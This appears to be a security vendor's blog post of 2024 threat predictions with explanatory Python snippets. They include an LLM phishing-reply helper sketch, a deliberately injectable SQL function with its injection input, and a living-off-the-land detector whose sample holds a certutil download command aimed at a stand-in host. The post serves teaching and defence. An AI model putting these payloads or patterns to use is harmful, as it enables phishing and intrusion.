What does 2024 look like through a cybersecurity lens? F5 Labs delves in.
As we peer into the future of cybersecurity, our predictions underscore the need for continuous adaptation and innovation in defending against evolving cyber threats. Whether it’s addressing the socioeconomic disparities in cybersecurity resilience, fortifying edge computing environments, or preparing for seemingly endless AI-driven assaults on our lives, the future cybersecurity landscape demands a proactive and collaborative approach to safeguard our digital future.
Prediction #1: Generative AI will converse with phishing victims
Large language models (LLMs) are set to take over the back-and-forth between phisher and victim.
Organized crime gangs will benefit from no longer needing to employ individuals to translate messages from victims and act as a “support center”. Instead, generative AI will translate between the attackers’ language and the victim’s, responding with authentic-sounding messages that coach the victim along the path of being socially engineered.
By incorporating publicly available personal information to create incredibly lifelike scams, organized cybercrime groups will take the phishing-as-a-service we already know and magnify it both in scale and efficiency.
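To underline how low this barrier has become, here is a minimal, hypothetical sketch of such a translate-and-reply pipeline using the OpenAI Python client. The model name and prompt wording are illustrative assumptions, not anything observed in a real campaign; the point is how completely a few lines of code can replace the human “support center”.

```python
# Hypothetical sketch: an LLM-backed translate-and-reply loop.
# Model name and prompt wording are illustrative assumptions.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

def draft_reply(incoming_message: str, operator_language: str = "en") -> str:
    """Translate an incoming message for the operator and draft a fluent,
    natural-sounding reply in the sender's own language."""
    response = client.chat.completions.create(
        model="gpt-4o-mini",  # illustrative model choice
        messages=[
            {
                "role": "system",
                "content": (
                    f"Translate the user's message into {operator_language}, "
                    "then draft a natural-sounding reply in the user's "
                    "original language."
                ),
            },
            {"role": "user", "content": incoming_message},
        ],
    )
    return response.choices[0].message.content
```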
Prediction #2: Organized crime will use generative AI with fake accounts
There is huge potential for AI-based fake accounts containing posts and images that are indiscernible from real human content. All attack strategies that fake accounts engender, including fraud, credential stuffing, disinformation, and marketplace manipulation, could see an enormous boost in productivity when it costs zero effort to match human realism.
Prediction #3: Nation-states will use generative AI for disinformation
Generative AI tools have the potential to significantly change the way malicious information operations are conducted with fake content creation, automated text generation for disinformation, targeted misinformation campaigns, and circumvention of content moderation.
We have already observed genAI-created content being used on a small scale in current conflicts around the world. At a larger scale, we expect different actors to use it ahead of major world events, which in 2024 include the U.S. presidential election and the Olympics in Paris.
Concerns such as these led Adobe, Microsoft, the BBC, and others to create the C2PA standard, a technique for cryptographically watermarking the origin of digital media. Time will tell whether it has any measurable impact.
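As a rough illustration of the principle behind C2PA, though not the actual manifest format, the sketch below signs media bytes with the publisher’s private key so that any later alteration is detectable. It uses Python’s cryptography library, with placeholder bytes standing in for a real media file.

```python
# Minimal sketch of cryptographic provenance: the publisher signs media
# at creation time; anyone with the public key can detect tampering.
# This is NOT the real C2PA manifest format, only the underlying idea.
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

signing_key = Ed25519PrivateKey.generate()  # publisher's private key
public_key = signing_key.public_key()       # distributed to verifiers

media_bytes = b"\x89PNG...placeholder media bytes..."  # stand-in for a file
signature = signing_key.sign(media_bytes)

# Verification fails loudly if even one byte of the media has changed.
try:
    public_key.verify(signature, media_bytes)
    print("Provenance intact: media matches the publisher's signature.")
except InvalidSignature:
    print("Media has been altered since it was signed.")
```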
Prediction #4: Hacktivism will grow thanks to generative AI and technological advancement
Hacktivist activity related to major world events is expected to grow as computing power continues to become more affordable and, crucially, easier to use. Using AI tools and the power of their smartphones and laptops, it is likely that more unsophisticated actors will join the fight in cyber space as hacktivists.
Over the past couple of years, the world has observed a resurgence in hacktivist activity, starting with threat actors expressing support for both sides of the Russian invasion of Ukraine. In more recent conflicts, only a small amount of hacktivist activity was seen at first, but as violence has escalated on the physical battlefield, hacktivists have moved to progressively more destructive attacks. Intelligence reports describe availability attacks such as distributed denial-of-service, along with data leaks, website defacements, and a clear focus on attempting to disrupt critical infrastructure.
With world events like the Olympics, elections, and ongoing wars taking place in 2024, hacktivists are likely to use these opportunities to gain notoriety for their group and sympathy for the causes they support. Attendees, sponsors, and other loosely affiliated organizations are likely to become targets, if not victims, of these geopolitically motivated hacktivists. This targeting is likely to extend beyond individuals to companies and organizations that support different causes.
Prediction #5: Web attacks will use real-time input from generative AI
With their impressive ability to create code, LLMs can, and will, be used to direct the sequence of procedures during live attacks, allowing attackers to react to defenses as they encounter them.
By leveraging APIs from open genAI systems such as ChatGPT, or by building their own LLMs, attackers will be able to incorporate the knowledge and ideas of an AI system during a live attack on a website or network. Should an attack against a website be blocked by security controls, an AI system can evaluate the response and suggest alternative ways to attack.
Look for LLMs to diversify attack chains to our detriment soon.
Prediction #6: LLLMs (Leaky Large Language Models)
Fresh research has shown disturbingly simple ways in which LLMs can be tricked into revealing their training data, which often includes proprietary and personal data. The rush to create proprietary LLMs could result in many more examples of training data being exposed, if not through novel attacks, then by rushed and misconfigured security controls.
We expect to see some spectacular failures of GenAI-driven tools—such as massive leaks of PII, novel techniques to gain unauthorized access, and denial of service attacks.
As with cloud breaches, the impact of LLM leaks has the potential to be enormous because of the sheer quantity of data involved.
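One of the simplest guardrails whose absence turns a leak into a headline is an output filter. The sketch below is a minimal, assumed example: scan model responses for obvious PII patterns before they leave the service. A real deployment would need far more than regular expressions.

```python
# Minimal sketch of an LLM output guardrail: redact obvious PII patterns
# before a response is returned. Patterns are illustrative, not exhaustive.
import re

PII_PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "us_ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "card_number": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def redact_pii(model_output: str) -> str:
    """Replace anything matching a known PII pattern with a placeholder."""
    for label, pattern in PII_PATTERNS.items():
        model_output = pattern.sub(f"[REDACTED {label.upper()}]", model_output)
    return model_output

print(redact_pii("Sure! Jane's email is jane.doe@example.com, SSN 123-45-6789."))
# -> Sure! Jane's email is [REDACTED EMAIL], SSN [REDACTED US_SSN].
```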
Prediction #7: Generative Vulnerabilities
Many developers, seasoned and newbie alike, increasingly look to generative AI to write code or check for bugs. But without the correct safeguards in place, many foresee LLMs creating a deluge of vulnerable code that is difficult to secure. While open source software (OSS) poses risks of its own, it benefits from an inherent fix-once approach: should a vulnerability be discovered in an OSS library, it can be fixed once, and the fix flows to everyone who uses that library. With genAI code generation, every developer ends up with a unique, bespoke piece of code.
Code assistants write code so quickly that developers may not have time to review it. Depending on when the LLM was trained, it may not even be aware of the latest vulnerabilities, making it impossible for the model to construct code that avoids them or avoids importing vulnerable libraries.
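To make the pattern concrete, the sketch below uses hypothetical function and table names to show the kind of bug code assistants frequently reproduce, string-formatted SQL, next to the standard parameterized fix.

```python
# Hypothetical example of assistant-style vulnerable code vs. the fix.
import sqlite3

def find_user_unsafe(conn: sqlite3.Connection, username: str):
    # Typical assistant output: string-formatted SQL, open to injection.
    return conn.execute(
        f"SELECT id, username FROM users WHERE username = '{username}'"
    ).fetchall()

def find_user_safe(conn: sqlite3.Connection, username: str):
    # The fix: let the database driver bind the parameter.
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
conn.execute("INSERT INTO users (username) VALUES ('alice')")

print(find_user_unsafe(conn, "' OR '1'='1"))  # injection returns every row
print(find_user_safe(conn, "' OR '1'='1"))    # returns nothing
```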
In the age of generative AI, organizations that prioritize speed over security will inevitably introduce new vulnerabilities.
Prediction #8: Attacks on the Edge
Physical tampering, software and API vulnerabilities, and management challenges are all risks that are exacerbated in an edge context.
Seventy-five percent of enterprise data is predicted to be generated and processed outside the traditional confines of data centers or the cloud. This paradigm redefines organizational boundaries, since workloads at the edge may harbor sensitive information and privileges.
Just as with attacks on multifactor authentication (MFA), attackers will focus their time where it has the biggest impact. If the shift to edge computing is handled as carelessly as cloud computing sometimes has been, expect to see a similar number of high-profile incidents over the coming year.
Prediction #9: Attackers will improve their ability to live off the Land
Growing complexity of IT environments, particularly in cloud and hybrid architectures, will make it more challenging to monitor and detect living-off-the-land (LOTL) attacks.
Attackers are increasingly turning to LOTL techniques that use legitimate management software already present on victim systems to achieve their malicious objectives. To make things worse, LOTL attacks can be incorporated into supply chain attacks to compromise critical infrastructure and disrupt operations.
Unless we improve visibility into our own networks, expect to see attackers use our own tools against us with increasing frequency.
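As a sketch of what that visibility could look like in practice, the example below sweeps process-creation events for legitimate Windows binaries that are commonly lived off. The event schema and detection rules are illustrative assumptions, not a production rule set.

```python
# Minimal LOTL detection sketch: flag process-creation events where a
# legitimate binary is invoked with commonly abused arguments.
# Rules and event schema are illustrative assumptions.
import re

LOTL_RULES = {
    "certutil.exe": re.compile(r"-urlcache|-decode", re.IGNORECASE),
    "bitsadmin.exe": re.compile(r"/transfer", re.IGNORECASE),
    "powershell.exe": re.compile(r"-enc|downloadstring|-nop", re.IGNORECASE),
    "mshta.exe": re.compile(r"javascript:|http", re.IGNORECASE),
}

def flag_lotl(events: list[dict]) -> list[dict]:
    """Return events whose image and command line match an abuse rule."""
    hits = []
    for event in events:
        image = event.get("image", "").lower().rsplit("\\", 1)[-1]
        rule = LOTL_RULES.get(image)
        if rule and rule.search(event.get("command_line", "")):
            hits.append(event)
    return hits

sample = [{
    "image": r"C:\Windows\System32\certutil.exe",
    "command_line": "certutil -urlcache -split -f http://bad.example/a.txt a.txt",
}]
print(flag_lotl(sample))  # the certutil download attempt is flagged
```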
Prediction #10: Cybersecurity Poverty Matrix
There are growing concerns about the effect that trends in security architecture will have on the security poverty line, a concept advanced more than a decade ago by the esteemed Wendy Nather. The security poverty line is defined as the level of knowledge, authority, and, above all, budget necessary to implement the bare minimum of security controls.
Today it seems that organizations need security orchestration, automation, and response (SOAR); security information and event management (SIEM); vulnerability management tools; and threat intelligence services, as well as programs like configuration management, incident response, penetration testing, and governance, risk, and compliance (GRC). Vinberg explains:
The key issue here is that many enterprise organizations choose to consume these controls as managed services, such that the expertise is guaranteed but so is the cost. The heightened cost of entry into each of these niches means that they will increasingly become all-or-nothing, and more organizations will eventually need to choose between them.
In other words, the idea of a simple poverty line no longer captures the tradeoff that exists today between focused capability in one niche and covering all of the bases. Instead of a poverty line we will have a poverty matrix of n dimensions, where n is the number of niches, and even well-resourced enterprises will struggle to put it all together.